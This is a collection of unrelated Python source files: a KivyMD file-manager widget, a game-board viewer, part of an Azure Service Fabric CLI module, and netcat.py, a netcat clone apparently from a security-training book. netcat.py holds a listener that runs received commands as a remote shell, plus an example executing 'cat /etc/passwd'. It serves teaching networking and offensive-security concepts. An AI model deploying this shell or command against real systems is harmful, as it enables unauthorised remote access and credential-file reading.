ListProperty,
BooleanProperty,
NumericProperty,
OptionProperty,
)
import kivymd.material_resources as m_res
from kivymd import images_path
from kivymd.uix.list import (
ILeftBodyTouch,
ILeftBody,
IRightBody,
IRightBodyTouch,
)
from kivymd.uix.button import MDIconButton
from kivymd.font_definitions import theme_font_styles
from kivymd.uix.behaviors import (
RectangularRippleBehavior,
CircularRippleBehavior,
)
from kivymd.theming import ThemableBehavior
ACTIVITY_MANAGER = """
#:import os os
#:import Window kivy.core.window.Window
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
access_string: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconFolder:
disabled: True
icon: root.icon
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
GridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols*self.spacing[0])/self.cols
row_force_default: True
size_hint_y: None
height: self.minimum_height
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_1, root.paths, 1, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text:
os.path.split(root.paths[0])[1].replace('thumb_', '')\
if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_2, root.paths, 2, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_2.text))
LabelContent:
id: label_box_2
text:
os.path.split(root.paths[1])[1].replace('thumb_', '')\
if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_3, root.paths, 3, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_3.text))
LabelContent:
id: label_box_3
text:
os.path.split(root.paths[2])[1].replace('thumb_', '')\
if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size:dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
canvas:
Color:
rgba:
1, 1, 1, 1
Rectangle:
size: self.size
pos: self.pos
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
md_bg_color: root.theme_cls.primary_color
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root.update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedBaseListItem>
size_hint_y: None
canvas:
Color:
rgba:
self.theme_cls.divider_color if root.divider is not None\
else (0, 0, 0, 0)
Line:
points: (root.x ,root.y, root.x+self.width, root.y)\
if root.divider == 'Full' else\
(root.x+root._txt_left_pad, root.y,\
root.x+self.width-root._txt_left_pad-root._txt_right_pad,\
root.y)
BoxLayout:
id: _text_container
orientation: 'vertical'
pos: root.pos
padding:
root._txt_left_pad, root._txt_top_pad,\
root._txt_right_pad, root._txt_bot_pad
MDLabel:
id: _lbl_primary
text: root.text
font_style: root.font_style
theme_text_color: root.theme_text_color
size_hint_y: None
shorten: True
max_lines: 1
height: self.texture_size[1]
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height/2 - self.height/2
size: dp(48), dp(48)
"""
class IconButton(CircularRippleBehavior, ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedBaseListItem(
ThemableBehavior, RectangularRippleBehavior, ButtonBehavior, FloatLayout
):
"""Base class to all ListItems. Not supposed to be instantiated on its own.
"""
text = StringProperty()
"""Text shown in the first line.
:attr:`text` is a :class:`~kivy.properties.StringProperty` and defaults
to "".
"""
text_color = ListProperty(None)
"""Text color used if theme_text_color is set to 'Custom'"""
font_style = OptionProperty("Subtitle1", options=theme_font_styles)
theme_text_color = StringProperty("Primary", allownone=True)
"""Theme text color for primary text"""
secondary_text = StringProperty()
"""Text shown in the second and potentially third line.
The text will wrap into the third line if the ListItem's type is set to
\'one-line\'. It can be forced into the third line by adding a \\n
escape sequence.
:attr:`secondary_text` is a :class:`~kivy.properties.StringProperty` and
defaults to "".
"""
secondary_text_color = ListProperty(None)
"""Text color used for secondary text if secondary_theme_text_color
is set to 'Custom'"""
secondary_theme_text_color = StringProperty("Secondary", allownone=True)
"""Theme text color for secondary primary text"""
secondary_font_style = OptionProperty("Body1", options=theme_font_styles)
divider = OptionProperty(
"Full", options=["Full", "Inset", None], allownone=True
)
_txt_left_pad = NumericProperty(dp(16))
_txt_top_pad = NumericProperty()
_txt_bot_pad = NumericProperty()
_txt_right_pad = NumericProperty(m_res.HORIZ_MARGINS)
_num_lines = 2
class ModifiedOneLineListItem(ModifiedBaseListItem):
"""A one line list item"""
_txt_top_pad = NumericProperty(dp(16))
_txt_bot_pad = NumericProperty(dp(15)) # dp(20) - dp(5)
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class ContainerSupport:
"""Overrides add_widget in a ListItem to include support for I*Body
widgets when the appropriate containers are present.
"""
_touchable_widgets = ListProperty()
def add_widget(self, widget, index=0):
if issubclass(widget.__class__, ILeftBody):
self.ids["_left_container"].add_widget(widget)
elif issubclass(widget.__class__, ILeftBodyTouch):
self.ids["_left_container"].add_widget(widget)
self._touchable_widgets.append(widget)
elif issubclass(widget.__class__, IRightBody):
self.ids["_right_container"].add_widget(widget)
elif issubclass(widget.__class__, IRightBodyTouch):
self.ids["_right_container"].add_widget(widget)
self._touchable_widgets.append(widget)
else:
return super().add_widget(widget)
def remove_widget(self, widget):
super().remove_widget(widget)
if widget in self._touchable_widgets:
self._touchable_widgets.remove(widget)
def on_touch_down(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, "down"):
return
super().on_touch_down(touch)
def on_touch_move(self, touch, *args):
if self.propagate_touch_to_touchable_widgets(touch, "move", *args):
return
super().on_touch_move(touch, *args)
def on_touch_up(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, "up"):
return
super().on_touch_up(touch)
def propagate_touch_to_touchable_widgets(self, touch, touch_event, *args):
triggered = False
for i in self._touchable_widgets:
if i.collide_point(touch.x, touch.y):
triggered = True
if touch_event == "down":
i.on_touch_down(touch)
elif touch_event == "move":
i.on_touch_move(touch, *args)
elif touch_event == "up":
i.on_touch_up(touch)
return triggered
class ModifiedOneLineIconListItem(ContainerSupport, ModifiedOneLineListItem):
_txt_left_pad = NumericProperty(dp(72))
class IconFolder(ILeftBodyTouch, MDIconButton):
pass
class BodyManagerWithPrevious(BoxLayout):
def get_source(
self, app, source_type, instance_label, paths, index, instance_content
):
if source_type == "folder" and instance_label.text != "":
source = f"{images_path}folder.png"
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f"{images_path}transparent.png"
return source
# FIXME: Add color for Black and White theme
# FIXME: When you first create the application cache,
# it crashes after a while with error:
"""
Traceback (most recent call last):
File "/home/kivy/Projects/KivyMD/demos/kitchen_sink/main.py", line 1698,
in <module>
KitchenSink().run()
File "/usr/lib/python3/dist-packages/kivy/app.py", line 826, in run
runTouchApp()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 502, in runTouchApp
EventLoop.window.mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 727, in mainloop
self._mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 460, in _mainloop
EventLoop.idle()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 337, in idle
Clock.tick()
File "/usr/lib/python3/dist-packages/kivy/clock.py", line 581, in tick
self._process_events()
File "kivy/_clock.pyx", line 384,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7839)
File "kivy/_clock.pyx", line 414,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7597)
File "kivy/_clock.pyx", line 412,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7519)
File "kivy/_clock.pyx", line 167,
in kivy._clock.ClockEvent.tick (kivy/_clock.c:3248)
File "/usr/lib/python3/dist-packages/kivy/cache.py",
line 212, in _purge_by_timeout
lastaccess = Cache._objects[category][key]['lastaccess']
KeyError: '/path/to/image'
"""
class MDFileManager(ThemableBehavior, FloatLayout):
icon = StringProperty("check")
"""The icon that will be used on the directory selection button."""
exit_manager = ObjectProperty(lambda x: None)
"""Function called when the user reaches directory tree root."""
select_path = ObjectProperty(lambda x: None)
"""Function, called when selecting a file/directory."""
ext = ListProperty()
"""List of file extensions to be displayed
in the manager. For example, ['py', 'kv'] - will filter out all files,
except python scripts and Kv Language."""
search = StringProperty("all")
"""It can take the values 'dirs' 'files' - display only directories
or only files. By default, it displays and folders, and files."""
current_path = StringProperty("/")
"""Current directory."""
use_access = BooleanProperty(True)
"""Show accec to files and directories."""
previous = BooleanProperty(False)
"""Shows only image previews."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
# If False - do not add a directory to the history -
# The user moves down the tree.
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = "Subtitle1"
if self.previous:
self.ext = [".png", ".jpg", ".jpeg"]
self.app = App.get_running_app()
if not os.path.exists("%s/thumb" % self.app.user_data_dir):
os.mkdir("%s/thumb" % self.app.user_data_dir)
else:
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon,
)
self.add_widget(action_button)
def update_list_images(self):
self.ids.rv.refresh_from_layout()
def split_list(self, l, n):
n = max(1, n)
return (l[i : i + n] for i in range(0, len(l), n))
def create_previous(self, path):
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = "%s/thumb/thumb_%s" % (
self.app.user_data_dir,
image,
)
if not os.path.exists(path_to_thumb):
im = Image.open(os.path.join(path, image))
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
def check_theme(self):
self.canvas.children[0].rgba = (
[0, 0, 0, 1]
if self.theme_cls.theme_style == "Dark"
else [1, 1, 1, 1]
)
def show(self, path):
"""Forms the body of a directory tree."""
self.check_theme()
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self.create_previous, args=(path,)).start()
split_dirs = self.split_list(dirs, 3)
split_files = self.split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []: # selected directory
pass
elif not dirs and not files: # directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"paths": list_dirs,
"type": "folder",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
for list_files in list(split_files):
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"paths": list_files,
"type": "files",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
else:
for name in dirs:
_path = path + name if path == "/" else path + "/" + name
access_string = self.get_access_string(_path)
if "r" not in access_string:
icon = "folder-lock"
else:
icon = "folder"
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": icon,
"dir_or_file_name": name,
"access_string": access_string,
"events_callback": self.select_dir_or_file,
}
)
for name in files:
_path = path + name if path == "/" else path + "/" + name
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": "file-outline",
"dir_or_file_name": name,
"access_string": self.get_access_string(_path),
"events_callback": self.select_dir_or_file,
}
)
self.ids.rv.data = manager_list
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != "":
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ""
if self.use_access:
access_data = {"r": os.R_OK, "w": os.W_OK, "x": os.X_OK}
for access in access_data.keys():
access_string += (
access if os.access(path, access_data[access]) else "-"
)
return access_string
def get_content(self, path):
"""Returns a list of the type [[Folder List], [file list]]."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir("%s/%s" % (path, content)):
if self.search == "all" or self.search == "dirs":
dirs.append(content)
else:
if self.search == "all" or self.search == "files":
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append(
"%s/thumb/thumb_%s"
% (self.app.user_data_dir, content)
)
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.history = []
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Returning to the branch down in the directory tree."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == "":
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
self.history = []
self.select_path(self.current_path)
Builder.load_string(ACTIVITY_MANAGER)
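# A minimal usage sketch (my assumption about typical wiring; the callbacks and the
# app integration are hypothetical, not part of this module):
#
#     def on_select(path):                      # hypothetical callback
#         print("selected:", path)
#
#     def on_exit(*args):                       # hypothetical callback
#         print("file manager closed")
#
#     file_manager = MDFileManager(exit_manager=on_exit,
#                                  select_path=on_select,
#                                  ext=[".py", ".kv"])  # optional extension filter
#     file_manager.show("/")                    # build the tree for the given directory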
|
netcat.py
|
import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading
def execute(cmd):
cmd = cmd.strip()
if not cmd:
return
output = subprocess.check_output(shlex.split(cmd),stderr=subprocess.STDOUT)
return output.decode()
class NetCat:
def __init__(self,args,buffer=None):
self.args = args
self.buffer = buffer
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def run(self):
if self.args.listen:
self.listen()
else:
self.send()
'''
Send: connects to the target and port,
receives data from the target,
and breaks on EOF; otherwise the loop continues until
a KeyboardInterrupt occurs.
'''
def send(self):
self.socket.connect((self.args.target, self.args.port))
if self.buffer:
self.socket.send(self.buffer)
try:
while True:
recv_len = 1
response = ''
while recv_len:
data = self.socket.recv(4096)
recv_len = len(data)
response += data.decode()
if recv_len < 4096:
break
if response:
print(response)
buffer = input('> ')
buffer += '\n'
self.socket.send(buffer.encode())
except KeyboardInterrupt:
print('User terminated.')
self.socket.close()
sys.exit()
'''
Listen: binds to the target and the port
and starts listening in a loop, passing each connected socket
to the handle method.
'''
def listen(self):
self.socket.bind((self.args.target, self.args.port))
self.socket.listen(5)
while True:
client_socket, _ = self.socket.accept()
client_thread = threading.Thread(
target=self.handle, args=(client_socket,)
)
client_thread.start()
'''
Handle: performs the task indicated by the command-line
arguments: executing a command, uploading a file, or
starting an interactive command shell.
'''
def handle(self, client_socket):
if self.args.execute:
output = execute(self.args.execute)
client_socket.send(output.encode())
elif self.args.upload:
file_buffer = b''
while True:
data = client_socket.recv(4096)
if data:
file_buffer += data
else:
break
with open(self.args.upload, 'wb') as f:
f.write(file_buffer)
message = f'Saved file {self.args.upload}'
client_socket.send(message.encode())
elif self.args.command:
cmd_buffer = b''
while True:
try:
client_socket.send(b'BHP:#<')
while '\n' not in cmd_buffer.decode():
cmd_buffer += client_socket.recv(64)
response = execute (cmd_buffer.decode())
if response:
client_socket.send(response.encode())
cmd_buffer = b''
except Exception as e:
print(f'server killed {e}')
self.socket.close()
sys.exit()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='BHP Net Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example:
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
echo 'ABC' | ./netcat.py -t 192.168.1.108 -p 135 # echo text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server
'''))
parser.add_argument('-c', '--command', action='store_true', help='command shell')
parser.add_argument('-e', '--execute', help='execute specified command')
parser.add_argument('-l', '--listen', action='store_true', help='listen')
parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
parser.add_argument('-t', '--target', default='192.168.1.203', help='specified IP')
parser.add_argument('-u', '--upload', help='upload file')
args = parser.parse_args()
if args.listen:
buffer = ''
else:
buffer = sys.stdin.read()
nc = NetCat(args, buffer.encode())
nc.run()
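# A programmatic usage sketch (my assumption; the tool is normally driven from the
# command line as in the epilog examples above). The Namespace fields mirror the
# argparse options defined in __main__:
#
#     ns = argparse.Namespace(target='192.168.1.108', port=5555,
#                             listen=False, command=False,
#                             execute='', upload='')
#     NetCat(ns, buffer=b'hello\n').run()   # connect to a listener and send one buffer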
|
viewer.py
|
'''
@ Harris Christiansen (Harris@HarrisChristiansen.com)
January 2016
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Game Viewer
'''
import pygame
import threading
import time
# Color Definitions
BLACK = (0,0,0)
GRAY_DARK = (110,110,110)
GRAY = (160,160,160)
WHITE = (255,255,255)
PLAYER_COLORS = [(255,0,0), (0,0,255), (0,128,0), (128,0,128), (0,128,128), (0,70,0), (128,0,0), (255,165,0), (30,250,30)]
# Table Properties
CELL_WIDTH = 20
CELL_HEIGHT = 20
CELL_MARGIN = 5
SCORES_ROW_HEIGHT = 28
INFO_ROW_HEIGHT = 25
class GeneralsViewer(object):
def __init__(self, name=None):
self._name = name
self._receivedUpdate = False
def updateGrid(self, update):
self._map = update
self._scores = sorted(update.scores, key=lambda general: general['total'], reverse=True) # Sort Scores
self._receivedUpdate = True
if "path" in dir(update):
self._path = [(path.x, path.y) for path in update.path]
else:
self._path = []
if "collect_path" in dir(update):
self._collect_path = [(path.x, path.y) for path in update.collect_path]
else:
self._collect_path = None
def _initViewier(self):
pygame.init()
# Set Window Size
window_height = self._map.rows * (CELL_HEIGHT + CELL_MARGIN) + CELL_MARGIN + SCORES_ROW_HEIGHT + INFO_ROW_HEIGHT
window_width = self._map.cols * (CELL_WIDTH + CELL_MARGIN) + CELL_MARGIN
self._window_size = [window_width, window_height]
self._screen = pygame.display.set_mode(self._window_size)
window_title = "Generals IO Bot"
if (self._name != None):
window_title += " - " + str(self._name)
pygame.display.set_caption(window_title)
self._font = pygame.font.SysFont('Arial', CELL_HEIGHT-10)
self._fontLrg = pygame.font.SysFont('Arial', CELL_HEIGHT)
self._clock = pygame.time.Clock()
def mainViewerLoop(self):
while not self._receivedUpdate: # Wait for first update
time.sleep(0.5)
self._initViewier()
done = False
while not done:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # User clicked quit
done = True # Flag done
elif event.type == pygame.MOUSEBUTTONDOWN: # Mouse Click
pos = pygame.mouse.get_pos()
# Convert screen to grid coordinates
column = pos[0] // (CELL_WIDTH + CELL_MARGIN)
row = pos[1] // (CELL_HEIGHT + CELL_MARGIN)
print("Click ", pos, "Grid coordinates: ", row, column)
if (self._receivedUpdate):
self._drawGrid()
self._receivedUpdate = False
time.sleep(0.2)
pygame.quit() # Done. Quit pygame.
def _drawGrid(self):
self._screen.fill(BLACK) # Set BG Color
# Draw Info Text
self._screen.blit(self._fontLrg.render("Turn: "+str(self._map.turn), True, WHITE), (10, self._window_size[1]-INFO_ROW_HEIGHT))
# Draw Scores
pos_top = self._window_size[1]-INFO_ROW_HEIGHT-SCORES_ROW_HEIGHT
score_width = self._window_size[0] / len(self._scores)
for i, score in enumerate(self._scores):
score_color = PLAYER_COLORS[int(score['i'])]
if (score['dead'] == True):
score_color = GRAY_DARK
pygame.draw.rect(self._screen, score_color, [score_width*i, pos_top, score_width, SCORES_ROW_HEIGHT])
self._screen.blit(self._font.render(self._map.usernames[int(score['i'])], True, WHITE), (score_width*i+3, pos_top+1))
self._screen.blit(self._font.render(str(score['total'])+" on "+str(score['tiles']), True, WHITE), (score_width*i+3, pos_top+1+self._font.get_height()))
# Draw Grid
for row in range(self._map.rows):
for column in range(self._map.cols):
tile = self._map.grid[row][column]
# Determine BG Color
color = WHITE
color_font = WHITE
if self._map._tile_grid[row][column] == -2: # Mountain
color = BLACK
elif self._map._tile_grid[row][column] == -3: # Fog
color = GRAY
elif self._map._tile_grid[row][column] == -4: # Obstacle
color = GRAY_DARK
elif self._map._tile_grid[row][column] >= 0: # Player
color = PLAYER_COLORS[self._map._tile_grid[row][column]]
else:
color_font = BLACK
pos_left = (CELL_MARGIN + CELL_WIDTH) * column + CELL_MARGIN
pos_top = (CELL_MARGIN + CELL_HEIGHT) * row + CELL_MARGIN
if (tile in self._map.cities or tile in self._map.generals): # City/General
# Draw Circle
pos_left_circle = int(pos_left + (CELL_WIDTH/2))
pos_top_circle = int(pos_top + (CELL_HEIGHT/2))
pygame.draw.circle(self._screen, color, [pos_left_circle, pos_top_circle], int(CELL_WIDTH/2))
else:
# Draw Rect
pygame.draw.rect(self._screen, color, [pos_left, pos_top, CELL_WIDTH, CELL_HEIGHT])
# Draw Text Value
if (tile.army != 0): # Don't draw on empty tiles
textVal = str(tile.army)
self._screen.blit(self._font.render(textVal, True, color_font), (pos_left+2, pos_top+2))
# Draw Path
if (self._path != None and (column,row) in self._path):
self._screen.blit(self._fontLrg.render("*", True, color_font), (pos_left+3, pos_top+3))
if (self._collect_path != None and (column,row) in self._collect_path):
self._screen.blit(self._fontLrg.render("*", True, PLAYER_COLORS[8]), (pos_left+6, pos_top+6))
# Limit to 60 frames per second
self._clock.tick(60)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
'''def _create_thread(f):
t = threading.Thread(target=f)
#t.daemon = True
t.start()
def _fakeUpdates():
viewer.updateGrid(maps[0])
time.sleep(1)
viewer.updateGrid(maps[1])
maps = generals_tests.maps
viewer = GeneralsViewer()
_create_thread(_fakeUpdates)
viewer.mainViewerLoop()'''
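# A threading sketch (my assumption, mirroring the commented test harness above):
# the bot pushes map updates from a worker thread via updateGrid(), while
# mainViewerLoop() owns the pygame window on the main thread.
#
#     viewer = GeneralsViewer("MyBot")
#     threading.Thread(target=my_bot_loop, args=(viewer,)).start()  # my_bot_loop is hypothetical;
#                                                                   # it calls viewer.updateGrid(map)
#     viewer.mainViewerLoop()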
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.cli.command_modules.servicefabric._sf_utils import _get_resource_group_by_name, _create_resource_group_name
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter',
'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
'WindowsServer2019Datacenter': "2019-Datacenter",
'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return cluster_list
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified, ' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
vault_id = None
